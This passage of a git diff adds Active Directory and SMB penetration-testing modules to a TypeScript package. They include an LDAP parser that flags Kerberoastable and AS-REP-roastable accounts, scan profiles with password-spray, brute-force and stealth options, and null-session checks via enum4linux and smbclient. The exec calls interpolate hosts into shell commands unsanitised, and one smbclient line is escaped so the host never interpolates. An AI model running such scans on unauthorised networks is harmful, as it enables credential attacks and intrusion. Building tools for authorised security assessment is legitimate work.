+  computers: NetScanTypes.ADComputer[]
+  domainInfo?: Partial<NetScanTypes.ADDomain>
+  passwordPolicy?: NetScanTypes.PasswordPolicy
+  findings: string[]
+}
+
+/**
+ * ldapsearch parser namespace.
+ */
+export namespace LdapsearchParser {
+  /**
+   * Parse ldapsearch output.
+   */
+  export function parse(output: string): LdapsearchResults {
+    const results: LdapsearchResults = {
+      entries: [],
+      users: [],
+      groups: [],
+      computers: [],
+      findings: [],
+    }
+
+    // Parse LDIF format
+    const entries = parseLDIF(output)
+    results.entries = entries
+
+    // Categorize entries
+    for (const entry of entries) {
+      const objectClasses = entry.objectClass.map((c) => c.toLowerCase())
+
+      if (objectClasses.includes("user") || objectClasses.includes("person")) {
+        // Skip computer accounts
+        if (objectClasses.includes("computer")) {
+          const computer = parseComputer(entry)
+          if (computer) {
+            results.computers.push(computer)
+          }
+        } else {
+          const user = parseUser(entry)
+          if (user) {
+            results.users.push(user)
+
+            // Check for sensitive attributes
+            if (user.dontRequirePreauth) {
+              results.findings.push(
+                `User ${user.samAccountName} has \"Do not require Kerberos preauthentication\" set (AS-REP roastable)`
+              )
+            }
+            if (user.servicePrincipalNames.length > 0) {
+              results.findings.push(
+                `User ${user.samAccountName} has ${user.servicePrincipalNames.length} SPN(s) (Kerberoastable)`
+              )
+            }
+            if (user.adminCount) {
+              results.findings.push(
+                `User ${user.samAccountName} has adminCount=1 (protected by AdminSDHolder)`
+              )
+            }
+          }
+        }
+      } else if (objectClasses.includes("group")) {
+        const group = parseGroup(entry)
+        if (group) {
+          results.groups.push(group)
+        }
+      } else if (objectClasses.includes("computer")) {
+        const computer = parseComputer(entry)
+        if (computer) {
+          results.computers.push(computer)
+        }
+      } else if (objectClasses.includes("domain") || objectClasses.includes("domaindns")) {
+        results.domainInfo = parseDomainInfo(entry)
+      } else if (objectClasses.includes("msds-passwordsettings")) {
+        results.passwordPolicy = parsePasswordSettings(entry)
+      }
+    }
+
+    // Look for password policy in domain entry
+    if (!results.passwordPolicy) {
+      for (const entry of entries) {
+        if (entry.attributes["minPwdLength"] || entry.attributes["lockoutThreshold"]) {
+          results.passwordPolicy = parsePolicyFromEntry(entry)
+          break
+        }
+      }
+    }
+
+    return results
+  }
+
+  /**
+   * Parse LDIF format into entries.
+   */
+  function parseLDIF(output: string): LDAPEntry[] {
+    const entries: LDAPEntry[] = []
+    const blocks = output.split(/\n\n+/)
+
+    for (const block of blocks) {
+      const lines = block.split("\n")
+      let currentEntry: LDAPEntry | null = null
+
+      for (let i = 0; i < lines.length; i++) {
+        let line = lines[i]
+
+        // Handle line continuation (lines starting with space)
+        while (i + 1 < lines.length && lines[i + 1].startsWith(" ")) {
+          line += lines[++i].slice(1)
+        }
+
+        // Skip comments and empty lines
+        if (line.startsWith("#") || !line.trim()) {
+          continue
+        }
+
+        // Parse DN
+        if (line.toLowerCase().startsWith("dn:")) {
+          if (currentEntry) {
+            entries.push(currentEntry)
+          }
+          currentEntry = {
+            dn: line.slice(3).trim(),
+            objectClass: [],
+            attributes: {},
+          }
+          continue
+        }
+
+        if (!currentEntry) {
+          continue
+        }
+
+        // Parse attribute: value
+        const colonIndex = line.indexOf(":")
+        if (colonIndex === -1) {
+          continue
+        }
+
+        const attr = line.slice(0, colonIndex).toLowerCase()
+        let value = line.slice(colonIndex + 1).trim()
+
+        // Handle base64 encoded values
+        if (value.startsWith(":")) {
+          try {
+            value = Buffer.from(value.slice(1).trim(), "base64").toString("utf8")
+          } catch {
+            value = value.slice(1).trim()
+          }
+        }
+
+        if (attr === "objectclass") {
+          currentEntry.objectClass.push(value)
+        } else {
+          if (!currentEntry.attributes[attr]) {
+            currentEntry.attributes[attr] = []
+          }
+          currentEntry.attributes[attr].push(value)
+        }
+      }
+
+      if (currentEntry) {
+        entries.push(currentEntry)
+      }
+    }
+
+    return entries
+  }
+
+  /**
+   * Parse user entry.
+   */
+  function parseUser(entry: LDAPEntry): NetScanTypes.ADUser | null {
+    const samAccountName = entry.attributes["samaccountname"]?.[0]
+    if (!samAccountName) {
+      return null
+    }
+
+    const uac = parseInt(entry.attributes["useraccountcontrol"]?.[0] || "0", 10)
+
+    return {
+      samAccountName,
+      distinguishedName: entry.dn,
+      userPrincipalName: entry.attributes["userprincipalname"]?.[0],
+      displayName: entry.attributes["displayname"]?.[0] || entry.attributes["cn"]?.[0],
+      memberOf: entry.attributes["memberof"] || [],
+      enabled: (uac & 0x2) === 0, // ACCOUNTDISABLE flag
+      passwordLastSet: parseWindowsTimestamp(entry.attributes["pwdlastset"]?.[0]),
+      lastLogon: parseWindowsTimestamp(entry.attributes["lastlogon"]?.[0]),
+      adminCount: entry.attributes["admincount"]?.[0] === "1",
+      servicePrincipalNames: entry.attributes["serviceprincipalname"] || [],
+      dontRequirePreauth: (uac & 0x400000) !== 0, // DONT_REQ_PREAUTH flag
+      passwordNeverExpires: (uac & 0x10000) !== 0, // DONT_EXPIRE_PASSWORD flag
+      passwordNotRequired: (uac & 0x20) !== 0, // PASSWD_NOTREQD flag
+      delegationEnabled: (uac & 0x80000) !== 0, // TRUSTED_FOR_DELEGATION
+      trustedForDelegation: (uac & 0x80000) !== 0, // TRUSTED_FOR_DELEGATION
+    }
+  }
+
+  /**
+   * Parse group entry.
+   */
+  function parseGroup(entry: LDAPEntry): NetScanTypes.ADGroup | null {
+    const samAccountName = entry.attributes["samaccountname"]?.[0]
+    if (!samAccountName) {
+      return null
+    }
+
+    const name = samAccountName.toLowerCase()
+    const privilegedGroups = [
+      "domain admins",
+      "enterprise admins",
+      "schema admins",
+      "administrators",
+      "account operators",
+      "server operators",
+      "backup operators",
+      "print operators",
+      "dnsadmins",
+      "group policy creator owners",
+    ]
+
+    return {
+      samAccountName,
+      distinguishedName: entry.dn,
+      description: entry.attributes["description"]?.[0] || "",
+      members: entry.attributes["member"] || [],
+      memberOf: entry.attributes["memberof"] || [],
+      isPrivileged: privilegedGroups.includes(name),
+      adminCount: entry.attributes["admincount"]?.[0] === "1",
+    }
+  }
+
+  /**
+   * Parse computer entry.
+   */
+  function parseComputer(entry: LDAPEntry): NetScanTypes.ADComputer | null {
+    const samAccountName = entry.attributes["samaccountname"]?.[0]?.replace("$", "")
+    if (!samAccountName) {
+      return null
+    }
+
+    const uac = parseInt(entry.attributes["useraccountcontrol"]?.[0] || "0", 10)
+
+    return {
+      samAccountName,
+      distinguishedName: entry.dn,
+      dnsHostname: entry.attributes["dnshostname"]?.[0],
+      operatingSystem: entry.attributes["operatingsystem"]?.[0],
+      operatingSystemVersion: entry.attributes["operatingsystemversion"]?.[0],
+      enabled: (uac & 0x2) === 0,
+      lastLogon: parseWindowsTimestamp(entry.attributes["lastlogon"]?.[0]),
+      isDomainController: (uac & 0x2000) !== 0, // SERVER_TRUST_ACCOUNT
+      trustedForDelegation: (uac & 0x80000) !== 0, // TRUSTED_FOR_DELEGATION
+      allowedToDelegateTo: entry.attributes["msds-allowedtodelegateto"] || [],
+    }
+  }
+
+  /**
+   * Parse domain info from entry.
+   */
+  function parseDomainInfo(entry: LDAPEntry): Partial<NetScanTypes.ADDomain> {
+    const name = extractDomainName(entry.dn)
+    const sid = entry.attributes["objectsid"]?.[0]
+
+    // Extract functional level
+    let functionalLevel = "Unknown"
+    const level = entry.attributes["msds-behavior-version"]?.[0]
+    if (level) {
+      const levelNum = parseInt(level, 10)
+      const levels: Record<number, string> = {
+        0: "2000",
+        1: "2003 Interim",
+        2: "2003",
+        3: "2008",
+        4: "2008 R2",
+        5: "2012",
+        6: "2012 R2",
+        7: "2016",
+      }
+      functionalLevel = levels[levelNum] || `Level ${levelNum}`
+    }
+
+    return {
+      name,
+      netbios: entry.attributes["name"]?.[0],
+      domainSID: sid,
+      functionalLevel: functionalLevel as NetScanTypes.ADFunctionalLevel,
+    }
+  }
+
+  /**
+   * Parse password settings entry.
+   */
+  function parsePasswordSettings(entry: LDAPEntry): NetScanTypes.PasswordPolicy {
+    return {
+      minLength: parseInt(entry.attributes["msds-minimumpasswordlength"]?.[0] || "0", 10),
+      maxAge: parseWindowsInterval(entry.attributes["msds-maximumpasswordage"]?.[0]),
+      minAge: parseWindowsInterval(entry.attributes["msds-minimumpasswordage"]?.[0]),
+      historyLength: parseInt(entry.attributes["msds-passwordhistorylength"]?.[0] || "0", 10),
+      complexity: (parseInt(entry.attributes["msds-passwordcomplexityenabled"]?.[0] || "0", 10) & 1) !== 0,
+      lockoutThreshold: parseInt(entry.attributes["msds-lockoutthreshold"]?.[0] || "0", 10),
+      lockoutDuration: parseWindowsInterval(entry.attributes["msds-lockoutduration"]?.[0]),
+      lockoutObservationWindow: parseWindowsInterval(entry.attributes["msds-lockoutobservationwindow"]?.[0]),
+    }
+  }
+
+  /**
+   * Parse password policy from domain entry.
+   */
+  function parsePolicyFromEntry(entry: LDAPEntry): NetScanTypes.PasswordPolicy {
+    return {
+      minLength: parseInt(entry.attributes["minpwdlength"]?.[0] || "0", 10),
+      maxAge: parseWindowsInterval(entry.attributes["maxpwdage"]?.[0]),
+      minAge: parseWindowsInterval(entry.attributes["minpwdage"]?.[0]),
+      historyLength: parseInt(entry.attributes["pwdhistorylength"]?.[0] || "0", 10),
+      complexity: true, // Usually enabled by default
+      lockoutThreshold: parseInt(entry.attributes["lockoutthreshold"]?.[0] || "0", 10),
+      lockoutDuration: parseWindowsInterval(entry.attributes["lockoutduration"]?.[0]),
+      lockoutObservationWindow: parseWindowsInterval(entry.attributes["lockoutobservationwindow"]?.[0]),
+    }
+  }
+
+  /**
+   * Extract domain name from DN.
+   */
+  function extractDomainName(dn: string): string {
+    const dcParts = dn
+      .split(",")
+      .filter((p) => p.toLowerCase().startsWith("dc="))
+      .map((p) => p.split("=")[1])
+    return dcParts.join(".")
+  }
+
+  /**
+   * Parse Windows FILETIME timestamp.
+   */
+  function parseWindowsTimestamp(value: string | undefined): number | undefined {
+    if (!value) return undefined
+    const filetime = BigInt(value)
+    if (filetime === 0n || filetime === 9223372036854775807n) {
+      return undefined
+    }
+    // Convert FILETIME to Unix timestamp (ms)
+    return Number((filetime - 116444736000000000n) / 10000n)
+  }
+
+  /**
+   * Parse Windows interval (negative 100-nanosecond intervals).
+   */
+  function parseWindowsInterval(value: string | undefined): number {
+    if (!value) return 0
+    const interval = BigInt(value)
+    // Convert to minutes
+    return Math.abs(Number(interval / -600000000n))
+  }
+
+  /**
+   * Extract Kerberoastable users.
+   */
+  export function getKerberoastableUsers(results: LdapsearchResults): NetScanTypes.ADUser[] {
+    return results.users.filter(
+      (u) => u.enabled && u.servicePrincipalNames.length > 0
+    )
+  }
+
+  /**
+   * Extract AS-REP roastable users.
+   */
+  export function getASRepRoastableUsers(results: LdapsearchResults): NetScanTypes.ADUser[] {
+    return results.users.filter((u) => u.enabled && u.dontRequirePreauth)
+  }
+
+  /**
+   * Get privileged group members.
+   */
+  export function getPrivilegedUsers(results: LdapsearchResults): NetScanTypes.ADUser[] {
+    const privilegedDNs = new Set<string>()
+
+    // Collect all members of privileged groups
+    for (const group of results.groups) {
+      if (group.isPrivileged) {
+        for (const member of group.members) {
+          privilegedDNs.add(member.toLowerCase())
+        }
+      }
+    }
+
+    // Find users who are privileged
+    return results.users.filter((u) =>
+      privilegedDNs.has(u.distinguishedName.toLowerCase())
+    )
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/profiles.ts b/packages/opencode/src/pentest/netscan/profiles.ts
new file mode 100644
index 00000000000..ad7b6e117a4
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/profiles.ts
@@ -0,0 +1,563 @@
+/**
+ * @fileoverview Network Scan Profiles
+ *
+ * Pre-defined scan profiles for different network infrastructure testing scenarios.
+ *
+ * @module pentest/netscan/profiles
+ */
+
+import { NetScanTypes } from "./types"
+
+/**
+ * Network scan profiles namespace.
+ */
+export namespace NetScanProfiles {
+  /**
+   * Discovery profile - map infrastructure only.
+   */
+  export const Discovery: NetScanTypes.ScanProfile = {
+    id: "discovery",
+    name: "Discovery",
+    description: "Map network infrastructure without active exploitation",
+    modules: {
+      ad: {
+        enabled: true,
+        enumeration: true,
+        users: false,
+        groups: false,
+        computers: false,
+        kerberoast: false,
+        asrepRoast: false,
+        gpo: false,
+        trusts: true,
+      },
+      smb: {
+        enabled: true,
+        shares: true,
+        nullSession: false,
+        signing: true,
+        vulns: false,
+      },
+      snmp: {
+        enabled: true,
+        walk: true,
+        communityBrute: false,
+        writeTest: false,
+      },
+      dns: {
+        enabled: true,
+        zoneTransfer: true,
+        enumeration: false,
+        cachePoison: false,
+      },
+      ldap: {
+        enabled: true,
+        anonBind: true,
+        enumeration: false,
+        passwordPolicy: false,
+      },
+      creds: {
+        enabled: false,
+        defaults: false,
+        spray: false,
+        brute: false,
+      },
+    },
+    rateLimit: 50,
+    timeout: 30000,
+    maxThreads: 10,
+  }
+
+  /**
+   * Quick profile - fast assessment.
+   */
+  export const Quick: NetScanTypes.ScanProfile = {
+    id: "quick",
+    name: "Quick",
+    description: "Fast network assessment with basic checks",
+    modules: {
+      ad: {
+        enabled: true,
+        enumeration: true,
+        users: false,
+        groups: false,
+        computers: false,
+        kerberoast: false,
+        asrepRoast: false,
+        gpo: false,
+        trusts: false,
+      },
+      smb: {
+        enabled: true,
+        shares: true,
+        nullSession: true,
+        signing: true,
+        vulns: false,
+      },
+      snmp: {
+        enabled: true,
+        walk: false,
+        communityBrute: true,
+        writeTest: false,
+      },
+      dns: {
+        enabled: true,
+        zoneTransfer: true,
+        enumeration: false,
+        cachePoison: false,
+      },
+      ldap: {
+        enabled: true,
+        anonBind: true,
+        enumeration: false,
+        passwordPolicy: false,
+      },
+      creds: {
+        enabled: true,
+        defaults: true,
+        spray: false,
+        brute: false,
+      },
+    },
+    rateLimit: 100,
+    timeout: 30000,
+    maxThreads: 20,
+  }
+
+  /**
+   * Standard profile - normal pentest.
+   */
+  export const Standard: NetScanTypes.ScanProfile = {
+    id: "standard",
+    name: "Standard",
+    description: "Standard network infrastructure assessment",
+    modules: {
+      ad: {
+        enabled: true,
+        enumeration: true,
+        users: true,
+        groups: true,
+        computers: true,
+        kerberoast: true,
+        asrepRoast: true,
+        gpo: false,
+        trusts: true,
+      },
+      smb: {
+        enabled: true,
+        shares: true,
+        nullSession: true,
+        signing: true,
+        vulns: true,
+      },
+      snmp: {
+        enabled: true,
+        walk: true,
+        communityBrute: true,
+        writeTest: false,
+      },
+      dns: {
+        enabled: true,
+        zoneTransfer: true,
+        enumeration: true,
+        cachePoison: false,
+      },
+      ldap: {
+        enabled: true,
+        anonBind: true,
+        enumeration: true,
+        passwordPolicy: true,
+      },
+      creds: {
+        enabled: true,
+        defaults: true,
+        spray: true,
+        brute: false,
+      },
+    },
+    rateLimit: 50,
+    timeout: 60000,
+    maxThreads: 15,
+  }
+
+  /**
+   * Thorough profile - comprehensive scan.
+   */
+  export const Thorough: NetScanTypes.ScanProfile = {
+    id: "thorough",
+    name: "Thorough",
+    description: "Comprehensive network security assessment with all tests",
+    modules: {
+      ad: {
+        enabled: true,
+        enumeration: true,
+        users: true,
+        groups: true,
+        computers: true,
+        kerberoast: true,
+        asrepRoast: true,
+        gpo: true,
+        trusts: true,
+      },
+      smb: {
+        enabled: true,
+        shares: true,
+        nullSession: true,
+        signing: true,
+        vulns: true,
+      },
+      snmp: {
+        enabled: true,
+        walk: true,
+        communityBrute: true,
+        writeTest: true,
+      },
+      dns: {
+        enabled: true,
+        zoneTransfer: true,
+        enumeration: true,
+        cachePoison: true,
+      },
+      ldap: {
+        enabled: true,
+        anonBind: true,
+        enumeration: true,
+        passwordPolicy: true,
+      },
+      creds: {
+        enabled: true,
+        defaults: true,
+        spray: true,
+        brute: true,
+        lockoutThreshold: 3,
+        lockoutWindow: 30,
+      },
+    },
+    rateLimit: 30,
+    timeout: 120000,
+    maxThreads: 10,
+  }
+
+  /**
+   * Stealth profile - low-noise recon.
+   */
+  export const Stealth: NetScanTypes.ScanProfile = {
+    id: "stealth",
+    name: "Stealth",
+    description: "Low-noise reconnaissance with minimal footprint",
+    modules: {
+      ad: {
+        enabled: true,
+        enumeration: true,
+        users: false,
+        groups: false,
+        computers: false,
+        kerberoast: false,
+        asrepRoast: false,
+        gpo: false,
+        trusts: false,
+      },
+      smb: {
+        enabled: true,
+        shares: false,
+        nullSession: false,
+        signing: true,
+        vulns: false,
+      },
+      snmp: {
+        enabled: false,
+        walk: false,
+        communityBrute: false,
+        writeTest: false,
+      },
+      dns: {
+        enabled: true,
+        zoneTransfer: false,
+        enumeration: false,
+        cachePoison: false,
+      },
+      ldap: {
+        enabled: false,
+        anonBind: false,
+        enumeration: false,
+        passwordPolicy: false,
+      },
+      creds: {
+        enabled: false,
+        defaults: false,
+        spray: false,
+        brute: false,
+      },
+    },
+    rateLimit: 5,
+    timeout: 60000,
+    maxThreads: 2,
+    randomizeOrder: true,
+    jitterMs: 5000,
+  }
+
+  /**
+   * AD-focused profile - Active Directory specific testing.
+   */
+  export const ADFocused: NetScanTypes.ScanProfile = {
+    id: "ad-focused",
+    name: "AD Focused",
+    description: "Focus on Active Directory security assessment",
+    modules: {
+      ad: {
+        enabled: true,
+        enumeration: true,
+        users: true,
+        groups: true,
+        computers: true,
+        kerberoast: true,
+        asrepRoast: true,
+        gpo: true,
+        trusts: true,
+      },
+      smb: {
+        enabled: true,
+        shares: true,
+        nullSession: true,
+        signing: true,
+        vulns: false,
+      },
+      snmp: {
+        enabled: false,
+        walk: false,
+        communityBrute: false,
+        writeTest: false,
+      },
+      dns: {
+        enabled: false,
+        zoneTransfer: false,
+        enumeration: false,
+        cachePoison: false,
+      },
+      ldap: {
+        enabled: true,
+        anonBind: true,
+        enumeration: true,
+        passwordPolicy: true,
+      },
+      creds: {
+        enabled: true,
+        defaults: false,
+        spray: true,
+        brute: false,
+      },
+    },
+    rateLimit: 50,
+    timeout: 90000,
+    maxThreads: 10,
+  }
+
+  /**
+   * Custom profile template - user configurable.
+   */
+  export const Custom: NetScanTypes.ScanProfile = {
+    id: "custom",
+    name: "Custom",
+    description: "User-configurable scan profile",
+    modules: {
+      ad: {
+        enabled: true,
+        enumeration: true,
+        users: true,
+        groups: true,
+        computers: true,
+        kerberoast: true,
+        asrepRoast: true,
+        gpo: false,
+        trusts: true,
+      },
+      smb: {
+        enabled: true,
+        shares: true,
+        nullSession: true,
+        signing: true,
+        vulns: true,
+      },
+      snmp: {
+        enabled: true,
+        walk: true,
+        communityBrute: true,
+        writeTest: false,
+      },
+      dns: {
+        enabled: true,
+        zoneTransfer: true,
+        enumeration: true,
+        cachePoison: false,
+      },
+      ldap: {
+        enabled: true,
+        anonBind: true,
+        enumeration: true,
+        passwordPolicy: true,
+      },
+      creds: {
+        enabled: true,
+        defaults: true,
+        spray: false,
+        brute: false,
+      },
+    },
+    rateLimit: 50,
+    timeout: 60000,
+    maxThreads: 10,
+  }
+
+  /**
+   * All available profiles.
+   */
+  export const All: Record<NetScanTypes.ProfileId, NetScanTypes.ScanProfile> = {
+    discovery: Discovery,
+    quick: Quick,
+    standard: Standard,
+    thorough: Thorough,
+    stealth: Stealth,
+    "ad-focused": ADFocused,
+    custom: Custom,
+  }
+
+  /**
+   * Get a profile by ID.
+   */
+  export function get(id: NetScanTypes.ProfileId): NetScanTypes.ScanProfile | undefined {
+    return All[id]
+  }
+
+  /**
+   * List all profiles.
+   */
+  export function list(): NetScanTypes.ScanProfile[] {
+    return Object.values(All)
+  }
+
+  /**
+   * Create a custom profile with overrides.
+   */
+  export function createCustom(
+    base: NetScanTypes.ProfileId,
+    overrides: Partial<Omit<NetScanTypes.ScanProfile, "id">>
+  ): NetScanTypes.ScanProfile {
+    const baseProfile = get(base) || Custom
+    return {
+      ...baseProfile,
+      ...overrides,
+      id: "custom",
+      modules: {
+        ad: { ...baseProfile.modules.ad, ...overrides.modules?.ad },
+        smb: { ...baseProfile.modules.smb, ...overrides.modules?.smb },
+        snmp: { ...baseProfile.modules.snmp, ...overrides.modules?.snmp },
+        dns: { ...baseProfile.modules.dns, ...overrides.modules?.dns },
+        ldap: { ...baseProfile.modules.ldap, ...overrides.modules?.ldap },
+        creds: { ...baseProfile.modules.creds, ...overrides.modules?.creds },
+      },
+    }
+  }
+
+  /**
+   * Format profile for display.
+   */
+  export function format(profile: NetScanTypes.ScanProfile): string {
+    const lines: string[] = []
+    lines.push(`Profile: ${profile.name} (${profile.id})`)
+    lines.push(`Description: ${profile.description}`)
+    lines.push("")
+
+    lines.push("Active Directory:")
+    lines.push(`  Enabled: ${profile.modules.ad.enabled ? "Yes" : "No"}`)
+    if (profile.modules.ad.enabled) {
+      lines.push(`  Enumeration: ${profile.modules.ad.enumeration ? "Yes" : "No"}`)
+      lines.push(`  Users: ${profile.modules.ad.users ? "Yes" : "No"}`)
+      lines.push(`  Groups: ${profile.modules.ad.groups ? "Yes" : "No"}`)
+      lines.push(`  Kerberoast: ${profile.modules.ad.kerberoast ? "Yes" : "No"}`)
+      lines.push(`  AS-REP Roast: ${profile.modules.ad.asrepRoast ? "Yes" : "No"}`)
+      lines.push(`  GPO Analysis: ${profile.modules.ad.gpo ? "Yes" : "No"}`)
+      lines.push(`  Trusts: ${profile.modules.ad.trusts ? "Yes" : "No"}`)
+    }
+
+    lines.push("")
+    lines.push("SMB:")
+    lines.push(`  Enabled: ${profile.modules.smb.enabled ? "Yes" : "No"}`)
+    if (profile.modules.smb.enabled) {
+      lines.push(`  Shares: ${profile.modules.smb.shares ? "Yes" : "No"}`)
+      lines.push(`  Null Session: ${profile.modules.smb.nullSession ? "Yes" : "No"}`)
+      lines.push(`  Signing: ${profile.modules.smb.signing ? "Yes" : "No"}`)
+      lines.push(`  Vulnerabilities: ${profile.modules.smb.vulns ? "Yes" : "No"}`)
+    }
+
+    lines.push("")
+    lines.push("SNMP:")
+    lines.push(`  Enabled: ${profile.modules.snmp.enabled ? "Yes" : "No"}`)
+    if (profile.modules.snmp.enabled) {
+      lines.push(`  Walk: ${profile.modules.snmp.walk ? "Yes" : "No"}`)
+      lines.push(`  Community Brute: ${profile.modules.snmp.communityBrute ? "Yes" : "No"}`)
+      lines.push(`  Write Test: ${profile.modules.snmp.writeTest ? "Yes" : "No"}`)
+    }
+
+    lines.push("")
+    lines.push("DNS:")
+    lines.push(`  Enabled: ${profile.modules.dns.enabled ? "Yes" : "No"}`)
+    if (profile.modules.dns.enabled) {
+      lines.push(`  Zone Transfer: ${profile.modules.dns.zoneTransfer ? "Yes" : "No"}`)
+      lines.push(`  Enumeration: ${profile.modules.dns.enumeration ? "Yes" : "No"}`)
+      lines.push(`  Cache Poisoning: ${profile.modules.dns.cachePoison ? "Yes" : "No"}`)
+    }
+
+    lines.push("")
+    lines.push("LDAP:")
+    lines.push(`  Enabled: ${profile.modules.ldap.enabled ? "Yes" : "No"}`)
+    if (profile.modules.ldap.enabled) {
+      lines.push(`  Anonymous Bind: ${profile.modules.ldap.anonBind ? "Yes" : "No"}`)
+      lines.push(`  Enumeration: ${profile.modules.ldap.enumeration ? "Yes" : "No"}`)
+      lines.push(`  Password Policy: ${profile.modules.ldap.passwordPolicy ? "Yes" : "No"}`)
+    }
+
+    lines.push("")
+    lines.push("Credentials:")
+    lines.push(`  Enabled: ${profile.modules.creds.enabled ? "Yes" : "No"}`)
+    if (profile.modules.creds.enabled) {
+      lines.push(`  Defaults: ${profile.modules.creds.defaults ? "Yes" : "No"}`)
+      lines.push(`  Spray: ${profile.modules.creds.spray ? "Yes" : "No"}`)
+      lines.push(`  Brute Force: ${profile.modules.creds.brute ? "Yes" : "No"}`)
+    }
+
+    lines.push("")
+    lines.push(`Rate Limit: ${profile.rateLimit} req/s`)
+    lines.push(`Timeout: ${profile.timeout}ms`)
+    lines.push(`Max Threads: ${profile.maxThreads}`)
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format all profiles as a summary table.
+   */
+  export function formatTable(): string {
+    const lines: string[] = []
+    lines.push("| Profile | AD | SMB | SNMP | DNS | LDAP | Creds | Use Case |")
+    lines.push("|---------|----|----|------|-----|------|-------|----------|")
+
+    for (const profile of list()) {
+      const ad = profile.modules.ad.enabled ? (profile.modules.ad.kerberoast ? "full" : "enum") : "-"
+      const smb = profile.modules.smb.enabled ? (profile.modules.smb.vulns ? "full" : "basic") : "-"
+      const snmp = profile.modules.snmp.enabled ? (profile.modules.snmp.walk ? "walk" : "brute") : "-"
+      const dns = profile.modules.dns.enabled ? (profile.modules.dns.enumeration ? "full" : "zone") : "-"
+      const ldap = profile.modules.ldap.enabled ? (profile.modules.ldap.enumeration ? "full" : "anon") : "-"
+      const creds = profile.modules.creds.enabled
+        ? profile.modules.creds.brute
+          ? "all"
+          : profile.modules.creds.spray
+            ? "spray"
+            : "defaults"
+        : "-"
+
+      lines.push(`| ${profile.id} | ${ad} | ${smb} | ${snmp} | ${dns} | ${ldap} | ${creds} | ${profile.description} |`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/smb/index.ts b/packages/opencode/src/pentest/netscan/smb/index.ts
new file mode 100644
index 00000000000..1f66cdb651d
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/smb/index.ts
@@ -0,0 +1,19 @@
+/**
+ * @fileoverview SMB Module Exports
+ *
+ * Export all SMB testing functionality.
+ *
+ * @module pentest/netscan/smb
+ */
+
+export { SMBShares } from "./shares"
+export type { SMBAuth, ShareEnumOptions } from "./shares"
+
+export { SMBSessions } from "./sessions"
+export type { NullSessionResult, SessionTestOptions } from "./sessions"
+
+export { SMBSigning } from "./signing"
+export type { SMBSigningStatus, SigningCheckOptions } from "./signing"
+
+export { SMBVulns } from "./vulns"
+export type { SMBVulnerability, SMBVulnResult, VulnCheckOptions } from "./vulns"
diff --git a/packages/opencode/src/pentest/netscan/smb/sessions.ts b/packages/opencode/src/pentest/netscan/smb/sessions.ts
new file mode 100644
index 00000000000..23b823f2090
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/smb/sessions.ts
@@ -0,0 +1,320 @@
+/**
+ * @fileoverview SMB Session Testing
+ *
+ * Test for null sessions and anonymous access on SMB.
+ *
+ * @module pentest/netscan/smb/sessions
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Enum4linuxParser } from "../parsers/enum4linux"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "netscan.smb.sessions" })
+
+/**
+ * Null session test result.
+ */
+export interface NullSessionResult {
+  host: string
+  allowed: boolean
+  sharesAccessible: number
+  usersEnumerable: boolean
+  groupsEnumerable: boolean
+  passwordPolicyAccessible: boolean
+  findings: string[]
+}
+
+/**
+ * Session test options.
+ */
+export interface SessionTestOptions {
+  timeout?: number
+  verbose?: boolean
+}
+
+/**
+ * SMB sessions namespace.
+ */
+export namespace SMBSessions {
+  /**
+   * Test for null session access.
+   */
+  export async function testNullSession(
+    host: string,
+    options: SessionTestOptions = {}
+  ): Promise<NullSessionResult> {
+    const timeout = options.timeout || 60000
+    const result: NullSessionResult = {
+      host,
+      allowed: false,
+      sharesAccessible: 0,
+      usersEnumerable: false,
+      groupsEnumerable: false,
+      passwordPolicyAccessible: false,
+      findings: [],
+    }
+
+    log.info("Testing null session access", { host })
+
+    try {
+      // Use enum4linux-ng for comprehensive testing
+      const enum4linuxResult = await testWithEnum4linux(host, timeout)
+
+      result.allowed = enum4linuxResult.nullSessionAllowed
+      result.sharesAccessible = enum4linuxResult.shares.length
+      result.usersEnumerable = enum4linuxResult.users.length > 0
+      result.groupsEnumerable = enum4linuxResult.groups.length > 0
+      result.passwordPolicyAccessible = !!enum4linuxResult.passwordPolicy
+      result.findings.push(...enum4linuxResult.findings)
+
+      if (result.allowed) {
+        result.findings.push(`Null session allowed on ${host}`)
+      }
+      if (result.usersEnumerable) {
+        result.findings.push(`${enum4linuxResult.users.length} users enumerable via null session`)
+      }
+      if (result.groupsEnumerable) {
+        result.findings.push(`${enum4linuxResult.groups.length} groups enumerable via null session`)
+      }
+      if (result.passwordPolicyAccessible) {
+        result.findings.push("Password policy accessible via null session")
+      }
+    } catch (err) {
+      log.debug("enum4linux test failed, trying manual methods", { host, error: String(err) })
+
+      // Fallback to manual testing
+      const manualResult = await testManualNullSession(host, timeout)
+      Object.assign(result, manualResult)
+    }
+
+    log.info("Null session test complete", {
+      host,
+      allowed: result.allowed,
+      findings: result.findings.length,
+    })
+
+    return result
+  }
+
+  /**
+   * Test null session using enum4linux.
+   */
+  async function testWithEnum4linux(host: string, timeout: number) {
+    // Try enum4linux-ng first (newer version)
+    try {
+      const { stdout } = await execAsync(
+        `enum4linux-ng -A ${host} 2>&1`,
+        { timeout }
+      )
+      return Enum4linuxParser.parse(stdout)
+    } catch {
+      // Fallback to classic enum4linux
+      const { stdout } = await execAsync(
+        `enum4linux -a ${host} 2>&1`,
+        { timeout }
+      )
+      return Enum4linuxParser.parse(stdout)
+    }
+  }
+
+  /**
+   * Manual null session testing fallback.
+   */
+  async function testManualNullSession(
+    host: string,
+    timeout: number
+  ): Promise<Partial<NullSessionResult>> {
+    const result: Partial<NullSessionResult> = {
+      allowed: false,
+      sharesAccessible: 0,
+      usersEnumerable: false,
+      groupsEnumerable: false,
+      passwordPolicyAccessible: false,
+      findings: [],
+    }
+
+    // Test IPC$ access
+    try {
+      const { stdout, stderr } = await execAsync(
+        `smbclient //\${host}/IPC\$ -N -c 'exit' 2>&1`,
+        { timeout: 10000 }
+      )
+      const output = stdout + stderr
+
+      if (!output.includes("NT_STATUS_ACCESS_DENIED") && !output.includes("NT_STATUS_LOGON_FAILURE")) {
+        result.allowed = true
+        result.findings!.push("IPC$ accessible with null session")
+      }
+    } catch {
+      // IPC$ test failed
+    }
+
+    // Test share enumeration
+    try {
+      const { stdout, stderr } = await execAsync(
